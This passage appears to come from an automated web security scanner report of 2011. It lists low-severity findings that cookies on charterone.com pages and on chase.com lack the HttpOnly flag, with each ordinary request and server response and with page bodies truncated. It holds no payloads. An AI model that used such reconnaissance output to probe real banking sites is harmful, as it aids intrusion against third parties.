Content-Type: text/html; charset=utf-8
Content-Length: 190

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fcds.aspx">here</a>.</h2>
</body></html>

11.505. http://www.charterone.com/savings-and-cds/college-saver.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/college-saver.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/college-saver.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fcollege-saver.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 200

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fcollege-saver.aspx">here</a>.</h2>
</body></html>

11.506. http://www.charterone.com/savings-and-cds/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 194

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fdefault.aspx">here</a>.</h2>
</body></html>

11.507. http://www.charterone.com/savings-and-cds/homebuyer-savings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/homebuyer-savings.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/homebuyer-savings.aspx?WT.ac=homebuyersavings HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:13:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fhomebuyer-savings.aspx%3fwt.ac%3dhomebuyersavings
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 235

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fhomebuyer-savings.aspx%253fwt.ac%253dhomebuyersaving
...[SNIP]...

11.508. http://www.charterone.com/savings-and-cds/money-markets.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/money-markets.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/money-markets.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fmoney-markets.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 200

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fmoney-markets.aspx">here</a>.</h2>
</body></html>

11.509. http://www.charterone.com/security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /security/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:47:55 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 14986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.510. http://www.charterone.com/security/equal-housing-lender.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /security/equal-housing-lender.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/equal-housing-lender.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:23 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 13792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.511. http://www.charterone.com/services/standard-overdraft-practices.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /services/standard-overdraft-practices.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/standard-overdraft-practices.aspx?WT.ac=standardoverdraftpractices HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:35 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.512. http://www.charterone.com/small-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /small-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsmall-business%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 193

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsmall-business%252fdefault.aspx">here</a>.</h2>
</body></html>

11.513. http://www.charterone.com/small-business/business-banking-online.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /small-business/business-banking-online.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/business-banking-online.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com//small-business/business-banking-online.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-banking-online.aspx">here</a>.</h2>
</body></html>

11.514. http://www.charterone.com/small-business/business-checking-accounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /small-business/business-checking-accounts.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/business-checking-accounts.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com//small-business/business-checking-accounts.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-checking-accounts.aspx">here</a>.</h2>
</body></html>

11.515. http://www.charterone.com/small-business/business-loans.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /small-business/business-loans.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/business-loans.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com//small-business/business-loans.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 180

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-loans.aspx">here</a>.</h2>
</body></html>

11.516. http://www.charterone.com/spanish/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /spanish/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spanish/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:37:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:47:53 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 15768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.517. http://www.charterone.com/student-banking/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /student-banking/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-banking/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:26 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27709


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.518. http://www.charterone.com/student-banking/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /student-banking/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-banking/overview.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:15:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/error.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 138

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2ferror.aspx">here</a>.</h2>
</body></html>

11.519. http://www.charterone.com/student-loans/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /student-loans/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-loans/overview.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com//student-loans/overview.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.citizensbank.com//student-loans/overview.aspx">here</a>.</h2>
</body></html>

11.520. http://www.charterone.com/student-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /student-services/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-services/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:14:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:24:06 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 26105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.521. http://www.charterone.com/student-services/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /student-services/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-services/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:14:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:24:05 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 26105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.522. http://www.charterone.com/tools/SiteMap.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /tools/SiteMap.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/SiteMap.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:37:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:47:46 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 156512


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.523. http://www.charterone.com/tools/leaving.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /tools/leaving.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/leaving.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0


11.524. http://www.charterone.com/tools/regionalgateway.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /tools/regionalgateway.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tools/regionalgateway.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: HiddenPopup=popup=False; path=/
Set-Cookie: HiddenError=error=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.525. http://www.charterone.com/trufitstudentloan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /trufitstudentloan/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trufitstudentloan/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:35 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 46321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.526. https://www.chase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:30 GMT
Content-length: 22894
Content-type: text/html
